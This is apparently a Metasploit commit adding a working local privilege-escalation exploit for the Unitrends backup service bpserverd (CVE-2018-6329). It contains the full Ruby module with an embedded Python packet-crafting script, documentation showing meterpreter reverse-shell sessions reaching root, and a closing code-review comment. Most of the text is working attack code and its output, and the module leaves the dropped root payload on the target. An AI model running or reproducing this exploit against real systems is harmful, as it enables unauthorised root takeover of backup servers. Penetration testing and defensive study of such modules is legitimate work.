Land #9946 a UEB local priv escalation

4.x
h00die 2018-11-27 21:19:34 -05:00 committed by Metasploit
parent d05cc4a3ac
commit f23774d62e
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 255 additions and 0 deletions


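--- a/documentation/modules/exploit/linux/local/ueb_bpserverd_privesc.md
+++ b/documentation/modules/exploit/linux/local/ueb_bpserverd_privesc.md
@@ -0,0 +1,95 @@
+## Vulnerable Application
+It was discovered that the Unitrends `bpserverd` proprietary protocol, as exposed via `xinetd`,
+has an issue in which its authentication can be bypassed. A remote attacker could use this
+issue to execute arbitrary commands with root privilege on the target system.
+This is very similar to `exploits/linux/misc/ueb9_bpserverd` however it runs against the
+`localhost` by dropping a python script on the local file system. Unitrends stopped
+`bpserverd` from listening remotely on version 10.
+## Vulnerable Application
+This module has been tested successfully on:
+* UEB 9.2
+* UEB 10.0
+## Verification Steps
+1. Get a user shell with `exploit/linux/http/ueb_api_rce` with `set target 1`
+2. ```use exploit/linux/local/ueb_bpserverd_privesc ```
+3. ```set session [SESSION]```
+4. ```exploit```
+5. A root meterpreter session should have been opened successfully
+## Scenarios
+### UEB 10.0 on CentOS 6.5
+```
+msf > use exploit/linux/local/ueb_priv_esc
+msf exploit(linux/local/ueb_priv_esc) > set session 4
+session => 4
+msf exploit(linux/local/ueb_priv_esc) > exploit
+[*] Started reverse TCP handler on 15.0.0.177:4444
+[*] Writing payload executable to '/tmp/pEFoythF'
+[*] Writing privesc script to '/tmp/CTZSovJR'
+[*] Fixing permissions
+[*] Sending stage (857352 bytes) to 10.20.1.202
+[*] Meterpreter session 5 opened (15.0.0.177:4444 -> 10.20.1.202:45188) at 2018-04-27 16:44:28 -0400
+[+] Deleted /tmp/pEFoythF
+[+] Deleted /tmp/CTZSovJR
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
+### UEB 9.2 on CentOS 6
+```
+resource (ueb_priv.rb)> use exploit/linux/http/ueb_api_rce
+resource (ueb_priv.rb)> set rhost 1.1.1.1
+rhost => 1.1.1.1
+resource (ueb_priv.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (ueb_priv.rb)> set target 1
+target => 1
+resource (ueb_priv.rb)> run
+[*] Started reverse TCP handler on 2.2.2.2:4444
+[*] 1.1.1.1:443 - Sending requests to UEB...
+[*] Command Stager progress - 19.76% done (164/830 bytes)
+[*] Command Stager progress - 39.16% done (325/830 bytes)
+[*] Command Stager progress - 56.87% done (472/830 bytes)
+[*] Command Stager progress - 74.82% done (621/830 bytes)
+[*] Command Stager progress - 92.77% done (770/830 bytes)
+[*] Command Stager progress - 110.48% done (917/830 bytes)
+[*] Sending stage (861480 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:40216) at 2018-11-15 20:03:46 -0500
+[*] Command Stager progress - 126.63% done (1051/830 bytes)
+meterpreter > getuid
+Server username: uid=48, gid=48, euid=48, egid=48
+meterpreter > sysinfo
+Computer : 1.1.1.1
+OS : Red Hat 6.5 (Linux 2.6.32-573.26.1.el6.x86_64)
+Architecture : x64
+BuildTuple : i486-linux-musl
+Meterpreter : x86/linux
+meterpreter > background
+[*] Backgrounding session 1...
+resource (ueb_priv.rb)> use exploit/linux/local/ueb_bpserverd_privesc
+resource (ueb_priv.rb)> set session 1
+session => 1
+resource (ueb_priv.rb)> run
+[*] Started reverse TCP handler on 2.2.2.2:4444
+[*] Writing payload executable to '/tmp/.mM0iyQvoAO'
+[*] Writing privesc script to '/tmp/.sDjn0m'
+[*] Fixing permissions
+[*] Sending stage (861480 bytes) to 1.1.1.1
+[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:40219) at 2018-11-15 20:04:21 -0500
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```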


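--- a/modules/exploits/linux/local/ueb_bpserverd_privesc.rb
+++ b/modules/exploits/linux/local/ueb_bpserverd_privesc.rb
@@ -0,0 +1,160 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Local
+Rank = ExcellentRanking
+include Msf::Post::File
+include Msf::Exploit::EXE
+include Msf::Exploit::FileDropper
+def initialize(info={})
+super(update_info(info, {
+'Name' => 'Unitrends Enterprise Backup bpserverd Privilege Escalation',
+'Description' => %q{
+It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,
+has an issue in which its authentication can be bypassed. A remote attacker could use this
+issue to execute arbitrary commands with root privilege on the target system.
+This is very similar to exploits/linux/misc/ueb9_bpserverd however it runs against the
+localhost by dropping a python script on the local file system. Unitrends stopped
+bpserverd from listening remotely on version 10.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Cale Smith', # @0xC413
+'Benny Husted', # @BennyHusted
+'Jared Arave', # @iotennui
+'h00die' # msf adaptations
+],
+'DisclosureDate' => 'Mar 14 2018',
+'Platform' => 'linux',
+'Arch' => [ARCH_X86],
+'References' =>
+[
+['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000005691'],
+['URL', 'http://blog.redactedsec.net/exploits/2018/04/20/UEB9_tcp.html'],
+['EDB', '44297'],
+['CVE', '2018-6329']
+],
+'Targets' =>
+[
+[ 'UEB <= 10.0', { } ]
+],
+'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 2 },
+'SessionTypes' => ['shell', 'meterpreter'],
+'DefaultTarget' => 0
+}
+))
+register_advanced_options([
+OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"]),
+OptInt.new("BPSERVERDPORT", [true, "Port bpserverd is running on", 1743])
+])
+end
+def exploit
+pl = generate_payload_exe
+exe_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
+print_status("Writing payload executable to '#{exe_path}'")
+write_file(exe_path, pl)
+#register_file_for_cleanup(exe_path)
+pe_script = %Q{
+import socket
+import binascii
+import struct
+import time
+import sys
+RHOST = '127.0.0.1'
+XINETDPORT = #{datastore['BPSERVERDPORT']}
+cmd = "#{exe_path}"
+def recv_timeout(the_socket,timeout=2):
+the_socket.setblocking(0)
+total_data=[];data='';begin=time.time()
+while 1:
+#if you got some data, then break after wait sec
+if total_data and time.time()-begin>timeout:
+break
+#if you got no data at all, wait a little longer
+elif time.time()-begin>timeout*2:
+break
+try:
+data=the_socket.recv(8192)
+if data:
+total_data.append(data)
+begin=time.time()
+else:
+time.sleep(0.1)
+except:
+pass
+return ''.join(total_data)
+print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))
+try:
+s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s1.connect((RHOST,XINETDPORT))
+except:
+print "[!] Failed to connect!"
+exit()
+data = s1.recv(4096)
+bpd_port = int(data[-8:-3])
+try:
+pass
+s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s2.connect((RHOST, bpd_port))
+except:
+print "[!] Failed to connect!"
+s1.close()
+exit()
+print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT))
+print "[+] '{0}'".format(cmd)
+cmd_len = chr(len(cmd) + 3)
+packet_len = chr(len(cmd) + 23)
+#https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/modules/exploits/linux/misc/ueb9_bpserverd.rb#L72
+packet = '\\xa5\\x52\\x00\\x2d'
+packet += '\\x00' * 3
+packet += packet_len
+packet += '\\x00' * 3
+packet += '\\x01'
+packet += '\\x00' * 3
+packet += '\\x4c'
+packet += '\\x00' * 3
+packet += cmd_len
+packet += cmd
+packet += '\\x00' * 3
+s1.send(packet)
+data = recv_timeout(s2)
+print data
+s1.close()
+}
+pes_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
+print_status("Writing privesc script to '#{pes_path}'")
+write_file(pes_path, pe_script)
+#register_file_for_cleanup(pes_path)
+print_status("Fixing permissions")
+cmd_exec("chmod +x #{exe_path} #{pes_path}")
+vprint_status cmd_exec("python #{pes_path} -c '#{exe_path}'")
+end
+end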
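Review bot: The exploit never verifies that the escalation actually fired — the output of `cmd_exec("python #{pes_path} -c '#{exe_path}'")` at the end of `exploit` only goes to vprint_status, and the embedded script hides every failure behind bare `except:` blocks and `exit()`, so a wrong BPSERVERDPORT, a missing interpreter or a patched bpserverd all fail silently; the `-c '#{exe_path}'` argument is also ignored, since the script has the path baked in via `cmd`. The script uses Python 2 print statements, so the module additionally depends on `python` resolving to a 2.x interpreter on the target, which is never checked (Msf::Post::File is already included, so `command_exists?` is available). I would gate on both: `fail_with(Failure::NotFound, 'python (2.x) not found on target') unless command_exists?('python')` before the run, then `output = cmd_exec("python #{pes_path}")` and `fail_with(Failure::Unknown, 'bpserverd did not accept the command') unless output.include?('Connected!')`. Separately, both `register_file_for_cleanup` calls are commented out although FileDropper is included, so the root-executed payload and the script are left in WritableDir; if that is deliberate (e.g. to avoid unlinking the binary before bpserverd has executed it), a one-line comment saying so would stop the next maintainer from re-enabling them, otherwise they should be restored.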